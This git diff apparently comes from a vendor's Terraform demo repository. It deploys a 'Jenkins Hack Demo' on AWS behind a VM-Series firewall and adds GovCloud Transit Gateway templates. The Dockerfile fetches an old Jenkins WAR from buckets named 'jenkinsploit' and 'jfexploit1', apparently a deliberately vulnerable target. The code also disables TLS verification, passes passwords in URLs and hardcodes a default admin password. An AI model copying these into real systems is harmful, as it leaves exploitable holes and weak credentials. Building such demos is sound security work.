jobid = tree[0][1].text + print("Install latest Anti-Virus update - " + str(jobid)) + + completed = 0 + while (completed == 0): + time.sleep(10) + call = "https://%s/api/?type=op&cmd=%s&key=%s" % ( + fwMgtIP, jobid, api_key) + r = send_request(call) + tree = ET.fromstring(r.text) + + if (tree[0][0][5].text == 'FIN'): + logger.debug( + "AV install Status - " + str(tree[0][0][5].text) + " " + str(tree[0][0][12].text) + "% complete") + completed 
= 1 + else: + status = "Status - " + str(tree[0][0][5].text) + " " + str(tree[0][0][12].text) + "% complete" + print('{0}\r'.format(status)) + else: + logger.debug("Unable to schedule install") + + +def getApiKey(hostname, username, password): + ''' + Generate the API key from username / password + ''' + + call = "https://%s/api/?type=keygen&user=%s&password=%s" % (hostname, username, password) + + api_key = "" + while True: + try: + # response = urllib.request.urlopen(url, data=encoded_data, context=ctx).read() + response = send_request(call) + + + except DeployRequestException as updateerr: + logger.info("No response from FW. Wait 20 secs before retry") + time.sleep(10) + continue + + else: + api_key = ET.XML(response.content)[0][0].text + logger.info("FW Management plane is Responding so checking if Dataplane is ready") + logger.debug("Response to get_api is {}".format(response)) + return api_key + + +# def getFirewallStatus(fwMgtIP, api_key): +# """ +# Gets the firewall status by sending the API request show chassis status. +# :param fwMgtIP: IP Address of firewall interface to be probed +# :param api_key: Panos API key +# """ +# global gcontext +# +# cmd = urllib.request.Request( +# "https://" + fwMgtIP + "/api/?type=op&cmd=&key=" + api_key) +# # Send command to fw and see if it times out or we get a response +# logger.info("Sending command 'show chassis status' to firewall") +# try: +# response = urllib.request.urlopen(cmd, data=None, context=gcontext, timeout=5).read() +# +# except urllib.error.URLError: +# logger.debug("No response from FW. So maybe not up!") +# return 'no' +# # sleep and check again? +# else: +# logger.debug("Got response to 'show chassis status' {}".format(response)) +# +# resp_header = ET.fromstring(response) +# logger.debug('Response header is {}'.format(resp_header)) +# +# if resp_header.tag != 'response': +# logger.debug("Did not get a valid 'response' string...maybe a timeout") +# return 'cmd_error' +# +# if resp_header.attrib['status'] == 'error': +# logger.debug("Got an error for the command") +# return 'cmd_error' +# +# if resp_header.attrib['status'] == 'success': +# # The fw responded with a successful command execution. So is it ready? +# for element in resp_header: +# if element.text.rstrip() == 'yes': +# logger.info("FW Chassis is ready to accept configuration and connections") +# return 'yes' +# else: +# logger.info("FW Chassis not ready, still waiting for dataplane") +# time.sleep(10) +# return 'almost' + +def getFirewallStatus(fwIP, api_key): + fwip = fwIP + + """ + Gets the firewall status by sending the API request show chassis status. + :param fwMgtIP: IP Address of firewall interface to be probed + :param api_key: Panos API key + """ + global gcontext + + url = "https://%s/api/?type=op&cmd=&key=%s" % (fwip, api_key) + # Send command to fw and see if it times out or we get a response + logger.info("Sending command 'show chassis status' to firewall") + try: + response = requests.get(url, verify=False, timeout=10) + response.raise_for_status() + except requests.exceptions.Timeout as fwdownerr: + logger.debug("No response from FW. So maybe not up!") + return 'no' + # sleep and check again? + except requests.exceptions.HTTPError as fwstartgerr: + ''' + Firewall may return 5xx error when rebooting. 
Need to handle a 5xx response + raise_for_status() throws HTTPError for error responses + ''' + logger.infor("Http Error: {}: ".format(fwstartgerr)) + return 'cmd_error' + except requests.exceptions.RequestException as err: + logger.debug("Got RequestException response from FW. So maybe not up!") + return 'cmd_error' + else: + logger.debug("Got response to 'show chassis status' {}".format(response)) + + resp_header = ET.fromstring(response.content) + logger.debug('Response header is {}'.format(resp_header)) + + if resp_header.tag != 'response': + logger.debug("Did not get a valid 'response' string...maybe a timeout") + return 'cmd_error' + + if resp_header.attrib['status'] == 'error': + logger.debug("Got an error for the command") + return 'cmd_error' + + if resp_header.attrib['status'] == 'success': + # The fw responded with a successful command execution. So is it ready? + for element in resp_header: + if element.text.rstrip() == 'yes': + logger.info("FW Chassis is ready to accept configuration and connections") + return 'yes' + else: + logger.info("FW Chassis not ready, still waiting for dataplane") + time.sleep(10) + return 'almost' + + +def update_status(key, value): + global status_output + + if type(status_output) is not dict: + logger.info('Creating new status_output object') + status_output = dict() + + if key is not None and value is not None: + status_output[key] = value + + # write status to file to future tracking + write_status_file(status_output) + + +def write_status_file(message_dict): + """ + Writes the deployment state to a dict and outputs to file for status tracking + """ + try: + message_json = json.dumps(message_dict) + with open('deployment_status.json', 'w+') as dpj: + dpj.write(message_json) + + except ValueError as ve: + logger.error('Could not write status file!') + print('Could not write status file!') + sys.exit(1) + + +def getServerStatus(IP): + """ + Gets the server status by sending an HTTP request and checking for a 200 response code + """ + global gcontext + + call = ("http://" + IP + "/") + logger.info('URL request is {}'.format(call)) + # Send command to fw and see if it times out or we get a response + count = 0 + max_count = 15 + while True: + if count < max_count: + try: + count = count + 1 + r = send_request(call) + except DeployRequestException as e: + logger.debug("Got Invalid response".format(e)) + else: + logger.info('Jenkins Server responded with HTTP 200 code') + return 'server_up' + else: + break + return 'server_down' + + +def main(username, password, aws_access_key, aws_secret_key, aws_region, ec2_key_pair, bootstrap_bucket): + username = username + password = password + aws_access_key = aws_access_key + aws_secret_key = aws_secret_key + aws_region = aws_region + ec2_key_pair = ec2_key_pair + albDns = '' + nlbDns = '' + fwMgt = '' + + default_vars = { + 'aws_access_key': aws_access_key, + 'aws_secret_key': aws_secret_key, + 'aws_region': aws_region + } + + WebInDeploy_vars = { + 'aws_access_key': aws_access_key, + 'aws_secret_key': aws_secret_key, + 'aws_region': aws_region, + 'ServerKeyName': ec2_key_pair, + 'bootstrap_s3bucket': bootstrap_bucket + } + + waf_conf_vars = { + 'aws_access_key': aws_access_key, + 'aws_secret_key': aws_secret_key, + 'aws_region': aws_region, + 'ServerKeyName': ec2_key_pair, + 'alb_arn': albDns, + 'nlb-dns': nlbDns + } + + WebInFWConf_vars = { + 'aws_access_key': aws_access_key, + 'aws_secret_key': aws_secret_key, + 'aws_region': aws_region, + 'ServerKeyName': ec2_key_pair, + 'mgt-ipaddress-fw1': fwMgt, + 
'nlb-dns': nlbDns, + 'username': username, + 'password': password + } + + # Set run_plan to TRUE is you wish to run terraform plan before apply + run_plan = False + kwargs = {"auto-approve": True} + + # Class Terraform uses subprocess and setting capture_output to True will capture output + capture_output = kwargs.pop('capture_output', False) + + if capture_output is True: + stderr = subprocess.PIPE + stdout = subprocess.PIPE + else: + # if capture output is False, then everything will essentially go to stdout and stderrf + stderr = sys.stderr + stdout = sys.stdout + start_time = time.asctime() + print(f'Starting Deployment at {start_time}\n') + + # Build Infrastructure + + tf = Terraform(working_dir='./WebInDeploy') + + tf.cmd('init') + if run_plan: + # print('Calling tf.plan') + tf.plan(capture_output=False, var=WebInDeploy_vars) + + return_code1, stdout, stderr = tf.apply(var=WebInDeploy_vars, capture_output=capture_output, skip_plan=True, + **kwargs) + + web_in_deploy_output = tf.output() + + logger.debug('Got Return code for deploy WebInDeploy {}'.format(return_code1)) + + # update_status('web_in_deploy_stdout', stdout) + update_status('web_in_deploy_output', web_in_deploy_output) + + if return_code1 != 0: + logger.info("WebInDeploy failed") + update_status('web_in_deploy_status', 'error') + update_status('web_in_deploy_stderr', stderr) + print(json.dumps(status_output)) + exit(1) + else: + update_status('web_in_deploy_status', 'success') + + albDns = tf.output('ALB-DNS') + fwMgt = tf.output('MGT-IP-FW-1') + nlbDns = tf.output('NLB-DNS') + fwMgtIP = fwMgt + + WebInFWConf_vars['mgt-ipaddress-fw1'] = fwMgt + WebInFWConf_vars['nlb-dns'] = nlbDns + + WebInDeploy_vars['alb_dns'] = albDns + WebInDeploy_vars['nlb-dns'] = nlbDns + + # + # Apply WAF Rules + # + + tf = Terraform(working_dir='./waf_conf') + tf.cmd('init') + kwargs = {"auto-approve": True} + logger.info("Applying WAF config to App LB") + + if run_plan: + tf.plan(capture_output=capture_output, var=vars, **kwargs) + + return_code3, stdout, stderr = tf.apply(capture_output=capture_output, skip_plan=True, + var=waf_conf_vars, **kwargs) + + waf_conf_out = tf.output() + + update_status('waf_conf_output', waf_conf_out) + # update_status('waf_conf_stdout', stdout) + # update_status('waf_conf_stderr', stderr) + + logger.debug('Got Return code to deploy waf_conf {}'.format(return_code3)) + + if return_code3 != 0: + logger.info("waf_conf failed") + update_status('waf_conf_status', 'error') + update_status('waf_conf_stderr', stderr) + print(json.dumps(status_output)) + exit(1) + else: + update_status('waf_conf_status', 'success') + + logger.info("Got these values from output of first run\n\n") + logger.info("ALB address is {}".format(albDns)) + logger.info("nlb address is {}".format(nlbDns)) + logger.info("Firewall Mgt address is {}".format(fwMgt)) + + # + # Check firewall is up and running + # # + + api_key = getApiKey(fwMgtIP, username, password) + + while True: + err = getFirewallStatus(fwMgtIP, api_key) + if err == 'cmd_error': + logger.info("Command error from fw ") + + elif err == 'no': + logger.info("FW is not up...yet") + # print("FW is not up...yet") + time.sleep(60) + continue + + elif err == 'almost': + logger.info("MGT up waiting for dataplane") + time.sleep(20) + continue + + elif err == 'yes': + logger.info("FW is up") + break + + logger.debug('Giving the FW another 10 seconds to fully come up to avoid race conditions') + time.sleep(10) + fw = firewall.Firewall(hostname=fwMgtIP, api_username=username, api_password=password) + 
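+    # This pandevice Firewall handle is reused below by the ContentUpdater and for the final fw.commit().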
logger.info("Updating firewall with latest content pack") + + update_fw(fwMgtIP, api_key) + updateHandle = updater.ContentUpdater(fw) + + # updateHandle.download(fw) + # logger.info("Waiting 3 minutes for content update to download") + # time.sleep(210) + # updateHandle.install() + + # + # Configure Firewall + # + + tf = Terraform(working_dir='./WebInFWConf') + tf.cmd('init') + kwargs = {"auto-approve": True} + + logger.info("Applying addtional config to firewall") + + WebInFWConf_vars['mgt-ipaddress-fw1'] = fwMgt + + if run_plan: + tf.plan(capture_output=capture_output, var=WebInFWConf_vars) + + # update initial vars with generated fwMgt ip + + return_code2, stdout, stderr = tf.apply(capture_output=capture_output, skip_plan=True, + var=WebInFWConf_vars, **kwargs) + + web_in_fw_conf_out = tf.output() + + update_status('web_in_fw_conf_output', web_in_fw_conf_out) + # update_status('web_in_fw_conf_stdout', stdout) + + logger.debug('Got Return code for deploy WebInFwConf {}'.format(return_code2)) + + if return_code2 != 0: + logger.error("WebFWConfy failed") + update_status('web_in_fw_conf_status', 'error') + update_status('web_in_fw_conf_stderr', stderr) + print(json.dumps(status_output)) + exit(1) + else: + update_status('web_in_fw_conf_status', 'success') + + logger.info("Commit changes to firewall") + + fw.commit() + logger.info("waiting for commit") + time.sleep(60) + logger.info("waiting for commit") + + # + # Check Jenkins + # + + logger.info('Checking if Jenkins Server is ready') + + # FIXME - add outputs for all 3 dirs + + res = getServerStatus(albDns) + + if res == 'server_up': + logger.info('Jenkins Server is ready') + logger.info('\n\n ### Deployment Complete ###') + logger.info('\n\n Connect to Jenkins Server at http://{}'.format(albDns)) + else: + logger.info('Jenkins Server is down') + logger.info('\n\n ### Deployment Complete ###') + + # dump out status to stdout + print(json.dumps(status_output)) + + +if __name__ == '__main__': + parser = argparse.ArgumentParser(description='Get Terraform Params') + parser.add_argument('-u', '--username', help='Firewall Username', required=True) + parser.add_argument('-p', '--password', help='Firewall Password', required=True) + parser.add_argument('-k', '--aws_access_key', help='AWS Key', required=True) + parser.add_argument('-s', '--aws_secret_key', help='AWS Secret', required=True) + parser.add_argument('-r', '--aws_region', help='AWS Region', required=True) + parser.add_argument('-c', '--aws_key_pair', help='AWS EC2 Key Pair', required=True) + parser.add_argument('-b', '--s3_bootstrap_bucket', help='AWS S3 Bootstrap bucket', required=True) + + args = parser.parse_args() + username = args.username + password = args.password + aws_access_key = args.aws_access_key + aws_secret_key = args.aws_secret_key + aws_region = args.aws_region + ec2_key_pair = args.aws_key_pair + bootstrap_s3bucket = args.s3_bootstrap_bucket + + main(username, password, aws_access_key, aws_secret_key, aws_region, ec2_key_pair, bootstrap_s3bucket) diff --git a/aws/Jenkins_proj-master/destroy.py b/aws/Jenkins_proj-master/destroy.py index 0767fe20..5cc63f13 100644 --- a/aws/Jenkins_proj-master/destroy.py +++ b/aws/Jenkins_proj-master/destroy.py @@ -1,9 +1,20 @@ #!/usr/bin/env python3 """ -Paloaltonetworks Deploy_Jenkins_Hack_Demo.py - -This software is provided without support, warranty, or guarantee. -Use at your own risk. 
+# Copyright (c) 2018, Palo Alto Networks +# +# Permission to use, copy, modify, and/or distribute this software for any +# purpose with or without fee is hereby granted, provided that the above +# copyright notice and this permission notice appear in all copies. +# +# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES +# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF +# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR +# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES +# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN +# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF +# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. + +# Author: Justin Harris jharris@paloaltonetworks.com """ ''' @@ -68,7 +79,7 @@ def main(aws_access_key, aws_secret_key, aws_region): exit() else: - logger.info("Destroyed WebInDeploy ") + logger.info("Destroyed waf_conf Successfully") tf = Terraform(working_dir='./WebInDeploy') tf.cmd('init') @@ -82,12 +93,12 @@ def main(aws_access_key, aws_secret_key, aws_region): if return_code1 != 0: logger.info("WebInDeploy destroyed") - deployment_status = {'WebInDeploy': 'Fail'} - print(deployment_status) + print ('Failed to Destroy WebInDeploy') + exit(1) else: - deployment_status = {'WebInDeploy': 'Success'} - print(deployment_status) + print ('Destroyed WebInDeploy Successfully') + exit(0) diff --git a/aws/Jenkins_proj-master/jenkins/Dockerfile b/aws/Jenkins_proj-master/jenkins/Dockerfile index af9e7988..54ce0aef 100644 --- a/aws/Jenkins_proj-master/jenkins/Dockerfile +++ b/aws/Jenkins_proj-master/jenkins/Dockerfile @@ -21,7 +21,7 @@ ENV JENKINS_VERSION 2.32.1 RUN set -ex \ && [ -e /usr/share/jenkins ] || mkdir -p /usr/share/jenkins \ && [ -e /usr/share/jenkins/ref ] || mkdir -p /usr/share/jenkins/ref \ - && wget https://s3.amazonaws.com/jenkinsploit/jenkins-2-32.war -O /usr/share/jenkins/jenkins.war -q --progress=bar:force:noscroll --show-progress \ + && wget https://jfexploit1.s3-us-west-2.amazonaws.com/jenkins-2-32.war -O /usr/share/jenkins/jenkins.war -q --progress=bar:force:noscroll --show-progress \ && chown -R jenkins "$JENKINS_HOME" /usr/share/jenkins/ref EXPOSE 8080 diff --git a/aws/Jenkins_proj-master/requirements.txt b/aws/Jenkins_proj-master/requirements.txt index 54a21127..87044590 100644 --- a/aws/Jenkins_proj-master/requirements.txt +++ b/aws/Jenkins_proj-master/requirements.txt @@ -1,4 +1,10 @@ +certifi==2019.3.9 +chardet==3.0.4 +collections2==0.3.0 +idna==2.8 pan-python==0.14.0 pandevice==0.6.6 python-terraform==0.10.0 requests==2.21.0 +urllib3==1.24.2 +xmltodict==0.12.0 diff --git a/aws/RedLock-IAMroles-tf/readonly/aws_iam_policy_document_rl_ro.json b/aws/RedLock-IAMroles-tf/readonly/aws_iam_policy_document_rl_ro.json index 8979a064..a0daa20d 100644 --- a/aws/RedLock-IAMroles-tf/readonly/aws_iam_policy_document_rl_ro.json +++ b/aws/RedLock-IAMroles-tf/readonly/aws_iam_policy_document_rl_ro.json @@ -2,46 +2,24 @@ "Version": "2012-10-17", "Statement": [ { - "Action": [ - "acm:List*", - "apigateway:GET", - "appstream:Describe*", - "cloudtrail:GetEventSelectors", - "cloudtrail:LookupEvents", - "cloudsearch:Describe*", - "dynamodb:DescribeTable", - "ds:Describe*", - "elasticache:List*", - "eks:List*", - "eks:Describe*", - "elasticfilesystem:Describe*", - "elasticmapreduce:Describe*", - "elasticmapreduce:List*", - "inspector:Describe*", - "inspector:List*", - "glacier:List*", - "glacier:Get*", - "guardduty:List*", - 
"guardduty:Get*", - "iam:SimulatePrincipalPolicy", - "iam:SimulateCustomPolicy", - "kinesis:Describe*", - "kinesis:List*", - "rds:ListTagsForResource", - "sns:List*", - "sns:Get*", - "sqs:SendMessage", - "logs:FilterLogEvents", - "logs:Get*", - "logs:Describe*", - "secretsmanager:List*", - "secretsmanager:Describe*", - "lambda:List*", - "s3:GetAccountPublicAccessBlock", - "s3:GetBucketPublicAccessBlock" - ], + "Action": [ + "apigateway:GET", + "cognito-identity:ListTagsForResource", + "cognito-idp:ListTagsForResource", + "elasticbeanstalk:ListTagsForResource", + "elasticfilesystem:DescribeTags", + "glacier:GetVaultLock", + "glacier:ListTagsForVault", + "logs:GetLogEvents", + "secretsmanager:DescribeSecret", + "ssm:GetParameters", + "ssm:ListTagsForResource", + "sqs:SendMessage", + "elasticmapreduce:ListSecurityConfigurations", + "sns:listSubscriptions" + ], "Effect": "Allow", "Resource": "*" } ] - } \ No newline at end of file + } diff --git a/aws/RedLock-IAMroles-tf/readwrite/aws_iam_policy_document_rl_ro.json b/aws/RedLock-IAMroles-tf/readwrite/aws_iam_policy_document_rl_ro.json index 4d9ea73e..a0daa20d 100644 --- a/aws/RedLock-IAMroles-tf/readwrite/aws_iam_policy_document_rl_ro.json +++ b/aws/RedLock-IAMroles-tf/readwrite/aws_iam_policy_document_rl_ro.json @@ -2,46 +2,24 @@ "Version": "2012-10-17", "Statement": [ { - "Action": [ - "acm:List*", - "apigateway:GET", - "appstream:Describe*", - "cloudtrail:GetEventSelectors", - "cloudtrail:LookupEvents", - "cloudsearch:Describe*", - "dynamodb:DescribeTable", - "ds:Describe*", - "elasticache:List*", - "eks:List*", - "eks:Describe*", - "elasticfilesystem:Describe*", - "elasticmapreduce:Describe*", - "elasticmapreduce:List*", - "inspector:Describe*", - "inspector:List*", - "glacier:List*", - "glacier:Get*", - "guardduty:List*", - "guardduty:Get*", - "iam:SimulatePrincipalPolicy", - "iam:SimulateCustomPolicy", - "kinesis:Describe*", - "kinesis:List*", - "rds:ListTagsForResource", - "sns:List*", - "sns:Get*", - "sqs:SendMessage", - "logs:FilterLogEvents", - "logs:Get*", - "logs:Describe*", - "secretsmanager:List*", - "secretsmanager:Describe*", - "lambda:List*", - "s3:GetAccountPublicAccessBlock", - "s3:GetBucketPublicAccessBlock" - ], + "Action": [ + "apigateway:GET", + "cognito-identity:ListTagsForResource", + "cognito-idp:ListTagsForResource", + "elasticbeanstalk:ListTagsForResource", + "elasticfilesystem:DescribeTags", + "glacier:GetVaultLock", + "glacier:ListTagsForVault", + "logs:GetLogEvents", + "secretsmanager:DescribeSecret", + "ssm:GetParameters", + "ssm:ListTagsForResource", + "sqs:SendMessage", + "elasticmapreduce:ListSecurityConfigurations", + "sns:listSubscriptions" + ], "Effect": "Allow", "Resource": "*" } ] - } \ No newline at end of file + } diff --git a/aws/TGW-VPC-GovCloud/README.md b/aws/TGW-VPC-GovCloud/README.md new file mode 100644 index 00000000..6da38651 --- /dev/null +++ b/aws/TGW-VPC-GovCloud/README.md @@ -0,0 +1,50 @@ +# Transit Gateway Deployment for North/South and East/West Inspection +# The GovCloud Version + +This build is a port of existing work to AWS GovCloud. The original may be found here: + +https://github.com/wwce/terraform/tree/master/aws/TGW-VPC + +This terraform template will deploy a complete Transit Gateway(TGW) solution with Palo Alto Networks VM-Series Firewalls to inspect both N/S and E/W traffic. 
The follow diagram shows what will be deployed: + +![tgw-vpc](https://user-images.githubusercontent.com/21991161/53307956-ff23d680-3862-11e9-9fd1-49cbacb696ea.jpg) + + + This is a quick overview of what components are deployed +``` +1. Security VPC that includes 2 firewalls in seperate AZs. +2. The template will create 2 S3 buckets used for bootstrapping the firewall configuration. Do not create the S3 buckets manually. +3. Two Spoke VPCs. Each with two subnets and 1 ubuntu server deployed in it. +4. TGW with attachments and routing to support N/S and E/W traffic through the firewalls. +``` + + NOTE: + ``` + 1. There are some things that should be changed in the Variables.tf file. They are labeled at the top of the file. + 2. This assumes that the AWS CLI is installed on the machine doing the deploymnet + 3. Here is a link to setting up a creds file to access AWS: + https://docs.aws.amazon.com/eks/latest/userguide/getting-started.html + 4. After deployment the firewall username and password are: + Username: admin + Password: Pal0Alt0@123 + 5. us-gov-west was used for deployment testing. It should work in other regions provided all underlying features are available. + + ``` + + This is a screenshot of the output once the deployment has completed that shows how to connect to the various components: + +![tgwout](https://user-images.githubusercontent.com/21991161/53307965-1793f100-3863-11e9-8eaa-fabeb35d7cda.jpg) + + + # Support Policy +The guide in this directory and accompanied files are released under an as-is, best effort, support policy. These scripts should be seen as community supported and Palo Alto Networks will contribute our expertise as and when possible. We do not provide technical support or help in using or troubleshooting the components of the project through our normal support options such as Palo Alto Networks support teams, or ASC (Authorized Support Centers) partners and backline support options. The underlying product used (the VM-Series firewall) by the scripts or templates are still supported, but the support is only for the product functionality and not for help in deploying or using the template or script itself. +Unless explicitly tagged, all projects or work posted in our GitHub repository (at https://github.com/PaloAltoNetworks) or sites other than our official Downloads page on https://support.paloaltonetworks.com are provided under the best effort policy. + + # License + + + Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at + + http://www.apache.org/licenses/LICENSE-2.0 + + Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. 
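As a minimal sketch of the overrides called out in the NOTE above — the variable names come from `variables.tf` in this directory (shown later in this diff), while the values are placeholders to adjust for your environment — a `terraform.tfvars` file along these lines could be dropped next to the templates before running `terraform init` and `terraform apply`:

```
# terraform.tfvars -- example values only; variable names match variables.tf
aws_region          = "us-gov-west-1"        # GovCloud region used for deployment testing
aws_key             = "my-keypair"           # existing EC2 key pair name (placeholder)
bootstrap_s3bucket  = "my-tgw-bootstrap-1"   # must be globally unique; created by the template
bootstrap_s3bucket2 = "my-tgw-bootstrap-2"   # must be globally unique; created by the template
management_cidr     = "203.0.113.0/24"       # restrict firewall mgmt access to your own source range
```

Remember not to pre-create the two S3 buckets; the template creates and bootstraps them itself.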
diff --git a/aws/TGW-VPC-GovCloud/bootstrap.tf b/aws/TGW-VPC-GovCloud/bootstrap.tf new file mode 100644 index 00000000..a671bd2b --- /dev/null +++ b/aws/TGW-VPC-GovCloud/bootstrap.tf @@ -0,0 +1,97 @@ +# Create a BootStrap S3 Bucket + +resource "aws_s3_bucket" "bootstrap_bucket" { + bucket = "${var.bootstrap_s3bucket}" + acl = "private" + force_destroy = true + + tags { + Name = "bootstrap_bucket" + } +} + +# Create Folders and Upload Bootstrap Files +resource "aws_s3_bucket_object" "bootstrap_xml" { + bucket = "${aws_s3_bucket.bootstrap_bucket.id}" + acl = "private" + key = "config/bootstrap.xml" + source = "bootstrap_files/bootstrap.xml" +} + +resource "aws_s3_bucket_object" "init-cft_txt" { + bucket = "${aws_s3_bucket.bootstrap_bucket.id}" + acl = "private" + key = "config/init-cfg.txt" + source = "bootstrap_files/init-cfg.txt" +} + +resource "aws_s3_bucket_object" "software" { + bucket = "${aws_s3_bucket.bootstrap_bucket.id}" + acl = "private" + key = "software/" + source = "/dev/null" +} + +resource "aws_s3_bucket_object" "license" { + bucket = "${aws_s3_bucket.bootstrap_bucket.id}" + acl = "private" + key = "license/" + source = "/dev/null" +} + +resource "aws_s3_bucket_object" "content" { + bucket = "${aws_s3_bucket.bootstrap_bucket.id}" + acl = "private" + key = "content/" + source = "/dev/null" +} + +/* Roles, ACLs, Permissions, etc... */ + +resource "aws_iam_role" "bootstrap_role" { + name = "ngfw_bootstrap_role" + + assume_role_policy = < + + + + + $1$cweppdgb$pU2XxH3TD.QyD29.TXnVT. + + + yes + + + c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFESDNMbG9iZlVkT2VNVks0eVJwQmpRYUs0QUpPUTNYWWpaMjIvUFlONUVpVDF6TlVMYnd3NUhRVWV1Rk5qRHBiVnFNOXZSeENrUXFldTdUQzBCOWVVa1g0d2dLY3g1L0NkUWc2WTJTWlJtZmJWbEdseER4bjBlcDlOYWYwWkZzUkVvN0xuWXZvNmxFTlZlQ2cvcGNvVzNERzVySkJDSytzYUI0cFN5NGJjYVJiSmZwM3c4N0JXamExdlR1eGtqaHZncXNuVlM1eXVPWGRLSENtTU9CN2NBbUV2QkxvVFQ3NEdkNEYzYkNKZnVsT2c1TVk4M2Zzc3JDaG9ZTVVkeTFnQUExOSswVnFGbm5lcXo4UTduMW15bGNNb1krUGJxekJUREVIYU5CNW4vSVpCLzVMdDExTGFyU2xRYWRydWNHUmVEcmtPZDlBTGYvYlN3ZktBZnBvaXggQVdTLU9oaW8tS2V5 + + + + + yes + + + $1$kouigbds$mrNbt/msQehCS55jxNnYa. 
+ + + + + + + + + + + + + yes + 5 + + + yes + 5 + + + yes + 5 + + + yes + 10 + + + yes + 5 + + + + yes + + + + 10 + 10 + + 100 + 50 + + + + 10 + 10 + + 100 + 50 + + + + + + 100 + yes + + + + + + + + + + + + + + + + + + + + + no + + + + + no + + + no + + + + + + + + + + no + + + + + no + + + no + + + no + + + + + + + + + + + + 3 + 5 + wait-recover + + + + + + + + + aes-128-cbc + 3des + + + sha1 + + + group2 + + + 8 + + + + + aes-128-cbc + + + sha256 + + + group19 + + + 8 + + + + + aes-256-cbc + + + sha384 + + + group20 + + + 8 + + + + + sha1 + + + group2 + + + aes-128-cbc + + + 28800 + + + + + + + + aes-128-cbc + 3des + + + sha1 + + + group2 + + 1 + + + + + + aes-128-gcm + + + none + + + group19 + + 1 + + + + + + aes-256-gcm + + + none + + + group20 + + 1 + + + + + + sha1 + + + aes-128-cbc + + + + 3600 + + group2 + + + + + + aes-128-cbc + + + sha1 + + + + + + + + + -AQ==03WuQF4bZmvokbM9qLJwY6M9dbc=BUUtm3Pm3SpSd3q9y07uXzlJ2he3viHPQ1KZpb1V2rHqScOoKmGf2EldcIaQ2z12 + + + + + + yes + 10 + 3 + + aws + main + + + + yes + + + + + + no + + + no + + + + ethernet1/1 + + + 34.252.94.101 + + + + + + -AQ==Wd8wW4JkNwoNs0I49P3xNMnt3iA=e3T0TArSWXtHvUlQQQ5OMK+4xD6oFBpdV+jvdgPsU6F4fdzNNo71uC7f1HnxknN4 + + + + + + yes + 10 + 3 + + aws + main + + + + yes + + + + + + no + + + no + + + + ethernet1/1 + + + 52.211.42.95 + + + + + + + + + + real-time + + + high + + + high + + + medium + + + medium + + + low + + + low + + + low + + + + + + + + + + no + + + 1.25 + 0.5 + 900 + 300 + 900 + yes + + + + + yes + + + no + + + no + + + no + + + no + + + + ethernet1/1 + ethernet1/2 + + + + + + + + + + + + 192.168.1.1 + + + None + + + no + any + 2 + + ethernet1/1 + 10 + 0.0.0.0/0 + + + + + + + no + any + 2 + + + 192.168.101.1 + + + None + + ethernet1/2 + 10 + 10.0.0.0/8 + + + + + + + + + + + + + + + + + + yes + yes + no + no + + + updates.paloaltonetworks.com + + + + + wednesday + 01:02 + download-only + + + + + US/Pacific + + yes + yes + + FW-1 + + + + yes + + + FQDN + + c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFESDNMbG9iZlVkT2VNVks0eVJwQmpRYUs0QUpPUTNYWWpaMjIvUFlONUVpVDF6TlVMYnd3NUhRVWV1Rk5qRHBiVnFNOXZSeENrUXFldTdUQzBCOWVVa1g0d2dLY3g1L0NkUWc2WTJTWlJtZmJWbEdseER4bjBlcDlOYWYwWkZzUkVvN0xuWXZvNmxFTlZlQ2cvcGNvVzNERzVySkJDSytzYUI0cFN5NGJjYVJiSmZwM3c4N0JXamExdlR1eGtqaHZncXNuVlM1eXVPWGRLSENtTU9CN2NBbUV2QkxvVFQ3NEdkNEYzYkNKZnVsT2c1TVk4M2Zzc3JDaG9ZTVVkeTFnQUExOSswVnFGbm5lcXo4UTduMW15bGNNb1krUGJxekJUREVIYU5CNW4vSVpCLzVMdDExTGFyU2xRYWRydWNHUmVEcmtPZDlBTGYvYlN3ZktBZnBvaXggQVdTLU9oaW8tS2V5 + + + yes + yes + yes + yes + + + FW-1 + mgmt-interface-swap + + + + + + + + + + + + + ethernet1/1 + + + + + + + ethernet1/2 + + + + + + + + + 1001 + + + + + + + + + + 2001 + + + + + + + + + + 1002 + + + + + + + + + + 2002 + + + + + + + + + + + + + + + trust + + + untrust + + + any + + + any + + + any + + + any + + + any + + + tcp-1001 + tcp-1002 + tcp-2001 + tcp-2002 + + + any + + allow + yes + + + + trust + + + trust + + + any + + + any + + + any + + + any + + + any + + + any + + + any + + allow + yes + intrazone + + + + untrust + + + trust + + + any + + + any + + + any + + + any + + + any + + + any + + + any + + allow + yes + + + + + + + + + + ethernet1/1 + + + + + untrust + + + trust + + + any + + + any + + any + + + + untrust + + + untrust + + + any + + + 192.168.1.45 + + tcp-1001 + + + + ethernet1/2 + + + + + 22 + 10.1.1.45 + + ethernet1/1 + + + + untrust + + + untrust + + + any + + + 192.168.1.45 + + tcp-1002 + + + + ethernet1/2 + + + + + 22 + 10.1.2.45 + + + + + untrust + + + untrust + + + any + + + 192.168.1.45 + + tcp-2001 + + + + 
